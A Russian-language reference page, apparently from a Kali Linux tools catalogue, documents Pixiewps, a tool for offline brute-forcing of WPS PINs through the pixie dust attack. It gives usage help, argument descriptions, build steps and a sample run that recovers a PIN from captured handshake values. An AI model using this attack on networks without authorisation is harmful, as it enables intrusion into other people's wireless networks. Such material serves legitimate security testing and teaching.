You are here: Home » Беспроводные атаки » Pixiewps

Pixiewps

Описание Pixiewps

Pixiewps — это инструмент, написанный на C, он используется для оффлайн брутфорса пина WPS посредством эксплуатирования низкой или несуществующий энтропии некоторых точек доступа (атака pixie dust). Он предназначен только для образовательных целей. Вся благодарность за исследования направляется Dominique Bongard.

Особенности:

  • Оптимизация контрольной суммы: это делается в первую очередь в поиске валидных пинов (11’000);
  • Снижение энтропии seed с 32 до 25 бит для C псевдослучайной функции линейного конгруэнтного метода;
  • Малые ключи Диффи — Хеллмана: не нужно указывать открытый регистрационный ключ если эта же опция используется с Reaver.

Программа также попробует сначала с E-S0 = E-S1 = 0, затем попытается брутфорсить seed для PRNG, если указана опция –e-nonce.

Домашняя страница: https://github.com/wiire/pixiewps/

Author: wiire

License: GPLv3

Справка по Pixiewps

Использование:

pixiewps <аргументы>
Требуемые аргументы:

    -e, --pke           : Открытый ключ подписчика
    -r, --pkr           : Открытый ключ регистратора
    -s, --e-hash1       : Hash1 подписчика
    -z, --e-hash2       : Hash2 подписчика
    -a, --authkey       : Ключ аутентификации сеанса

Опциональные аргументы:

    -n, --e-nonce       : Одноразовый подписчика (режимы 2,3,4)
    -m, --r-nonce       : Одноразовый регистратор
    -b, --e-bssid       : BSSID подписчика
    -S, --dh-small      : Малые ключи Диффи — Хеллмана (PKr не нужен)   [Нет]
    -f, --force         : Брутфорс всего ключевого пространства (режим 4)       [Нет]
    -v, --verbosity     : Уровень вербальности 1-3, 1 — это самый тихий            [2]

    -h, --help          : Показать справку

Примеры:

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

Руководство по Pixiewps

Страница man отсутствует.

Пример популярного использования:

pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1> --e-hash2 <e-hash2> --authkey <authkey> --e-nonce <e-nonce>

который требует модифицированную версию Reaver или Bully, которые печатают AuthKey. Рекомендуется версия reaver-wps-fork-t6x.

Если показано следующее сообщение:

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

значит точка доступа должна быть уязвимой и Pixiewps следует запустить ещё раз с тем же набором данных и дополнительно с опцией --force или, как вариант, с новым набором данных.

Описание аргументов Pixiewps

-e, --pke

Публичный DH ключ подписчика, найденный в M1.

-r, --pkr

Публичный DH ключ регистратора, найденный в M2 или можно пропустить если задать --dh-small как в Reaver, так и в Pixiewps.

-s, --e-hash1

Hash-1 подписчика, найденный в M3.

-z, --e-hash2

Hash-2 подписчика, найденный в M3.

-a, --authkey

Ключ аутентификации сессии регистрационного протокола. Хотя этот параметр нужен для модифицированных версий Reaver или Bully, его можно пропустить если задать малые ключи Diffie-Hellman в Reaver и Pixiewps и указать --e-nonce, --r-nonce и --e-bssid.

-n, --e-nonce

Одноразовый подписчика, найденный в M1.

-m, --r-nonce

Одноразовый подписчика, найденный в M2.

-b, --e-bssid

BSSID подписчика.

-S, --dh-small

Малые ключи Диффи — Хеллмана. Эта же опция ДОЛЖНА быть также указана в Reaver (1.3 или более поздних версиях). Эту опцию следует избегать, если есть возможность.

-f, --force

Принудить Pixiewps перебирать всё пространство ключей (только для одного типа PRNG). Для завершения этого может понадобиться несколько минут.

-v, --verbosity

Уровень вербальности (1-3). Уровень 3 отображает больше всего информации.

-h, --help

Показать справку.

Примеры запуска Pixiewps

root@kali:~# pixiewps \
>    -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c \
>    -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48: \
08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7: \
2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: \
c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa \
:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12 \
:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a \
>    -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46: \
8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 \
:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94 \
:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d \
:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1 \
:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e \
>    -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 \
>    -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

 [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
 [*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b
 [+] WPS pin: 04847533

 [*] Time taken: 0 s

root@kali:~#

Установка Pixiewps

Программа предустановлена в Kali Linux.

Установка Pixiewps на Debian, Mint, Ubuntu

sudo apt-get install libssl-dev
git clone https://github.com/wiire/pixiewps.git
cd pixiewps/src
make
sudo make install

Скриншоты Pixiewps

Это утилита командной строки.

Инструкции по Pixiewps

Ссылки на инструкции будут добавлены позже.

Близкие программы:

Рекомендуемые статьи: